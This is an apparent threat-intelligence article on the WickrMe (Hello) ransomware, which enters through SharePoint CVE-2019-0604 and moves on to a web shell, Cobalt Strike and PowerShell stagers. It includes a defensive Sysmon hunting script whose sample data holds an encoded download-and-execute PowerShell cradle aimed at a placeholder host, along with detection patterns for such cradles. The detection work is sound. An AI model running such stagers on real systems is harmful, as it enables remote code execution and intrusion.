WickrMe Ransomware Description
A new ransomware operation has begun targeting Microsoft SharePoint servers, marking the first time that this particular entry point has been observed being used to break into private corporate networks and deploy ransomware. Previous targets of similar campaigns have been Microsoft Exchange email servers, Citrix gateways, F5 BIG-IP load balancers, and VPN products from Pulse Secure, Fortinet and Palo Alto Networks.
The attack campaign is being tracked by security vendors as the WickrMe Ransomware (also called Hello) because of the Wickr encrypted instant-messaging accounts that form part of the communication channels victims can use to reach the cybercriminals. The initial compromise vector exploited by the WickrMe Ransomware is a known remote code execution vulnerability, CVE-2019-0604, affecting Microsoft's SharePoint team collaboration servers. The exploit allows the threat actor to take control of the SharePoint server and drop a malicious web shell. The next step is to establish a backdoor by installing a Cobalt Strike beacon. The attackers can then run automated PowerShell scripts that ultimately drop and execute the final payload, the Hello Ransomware, on the compromised systems.
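The chain above (SharePoint web shell, then PowerShell stagers) leaves a distinctive trace in process telemetry: SharePoint pages execute inside the IIS worker process w3wp.exe, so anything a web shell runs appears as a child of w3wp.exe. The following hunting script is an added example, not code from the article or from any of the vendors it cites. It assumes Sysmon Event ID 1 (process creation) records exported as JSON lines with Sysmon's own field names (ParentImage, Image, CommandLine, ProcessId, UtcTime); the sample events it scans are constructed, and the encoded stager in them is built the same way an attacker passes one to PowerShell's -EncodedCommand switch (UTF-16LE, then base64), so the decoder is exercised on realistic input.

```python
"""Hunt Sysmon process-creation events for web-shell lineage on a SharePoint host.

Added example; not code from the article or from any vendor it cites.
Assumes Sysmon Event ID 1 records exported as JSON lines with Sysmon's field
names (ParentImage, Image, CommandLine, ProcessId, UtcTime). SharePoint runs
inside the IIS worker process w3wp.exe, so a web shell dropped after
exploitation runs its commands as children of w3wp.exe.
"""
import base64
import json
import ntpath
import re

IIS_WORKER = "w3wp.exe"
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Interpreters and living-off-the-land binaries a web shell typically calls.
SHELL_CHILDREN = POWERSHELL | {"cmd.exe", "rundll32.exe", "certutil.exe",
                               "bitsadmin.exe", "mshta.exe", "wscript.exe"}
# powershell.exe accepts abbreviated switches: -e, -ec, -enc, -EncodedCommand.
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_OR_BYPASS = re.compile(
    r"(?i)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|(?:ep|executionpolicy)\s+bypass)")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload as text, or None if absent/undecodable."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def classify(event):
    """Return the reasons an event looks like web-shell activity (empty = benign)."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    cmdline = event.get("CommandLine", "")
    reasons = []
    if parent == IIS_WORKER and child in SHELL_CHILDREN:
        reasons.append(f"{IIS_WORKER} spawned {child}")
    if child in POWERSHELL:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            reasons.append("encoded PowerShell command")
        if HIDDEN_OR_BYPASS.search(cmdline):
            reasons.append("hidden window or execution-policy bypass")
        # Look for a download cradle in the visible command line and the decoded payload.
        if DOWNLOAD_CRADLE.search(cmdline + " " + (decoded or "")):
            reasons.append("download cradle")
    return reasons


def hunt(lines):
    """Parse JSON-lines Sysmon events and return the suspicious ones with reasons."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines rather than abort the hunt
        reasons = classify(event)
        if reasons:
            findings.append({
                "time": event.get("UtcTime"),
                "pid": event.get("ProcessId"),
                "image": ntpath.basename(event.get("Image", "")),
                "reasons": reasons,
                "decoded": decode_encoded_command(event.get("CommandLine", "")),
            })
    return findings


# Constructed sample telemetry (not real logs). The stager is encoded the way an
# attacker passes it to -EncodedCommand: UTF-16LE text, then base64.
SAMPLE_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_ENC = base64.b64encode(SAMPLE_STAGER.encode("utf-16-le")).decode()
W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LINES = [json.dumps(e) for e in [
    {"UtcTime": "2021-04-12 09:14:03.117", "ProcessId": 4312, "ParentImage": W3WP,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": 'cmd.exe /c "whoami /all"'},
    {"UtcTime": "2021-04-12 09:14:41.502", "ProcessId": 4380, "ParentImage": W3WP,
     "Image": PS, "CommandLine": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENC}"},
    {"UtcTime": "2021-04-12 09:15:00.009", "ProcessId": 4402, "ParentImage": W3WP,
     "Image": r"C:\Windows\System32\conhost.exe", "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"UtcTime": "2021-04-12 09:20:17.330", "ProcessId": 5120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS, "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]] + ["this line is not JSON and must be skipped"]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LINES):
        print(f["time"], f["pid"], f["image"], "; ".join(f["reasons"]))
        if f["decoded"]:
            print("   decoded:", f["decoded"])
```

Run against the constructed sample, the script flags the cmd.exe child of w3wp.exe and the PowerShell stager (which it also decodes to reveal the download cradle), while the conhost.exe child and the administrator's PowerShell backup job launched from explorer.exe are left alone. On a real host the parent-process rule is the high-confidence signal; the command-line heuristics only raise severity and should be expected to miss stagers that are split across several processes or passed through files.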
Companies Were Warned about the Exploit
Last year, Microsoft published a blog post addressing the significant increase in observed attack campaigns that exploit vulnerabilities in networking devices and other internet-facing systems as entry points for the delivery of ransomware. CVE-2019-0604 was among the specific vulnerabilities named in that article. Microsoft urged companies to patch this set of vulnerabilities, which it believed could soon be targeted by ransomware groups.
The same SharePoint server bug had previously been exploited in campaigns launched by financially motivated cybercriminals as well as by state-sponsored espionage groups and other APTs (Advanced Persistent Threats).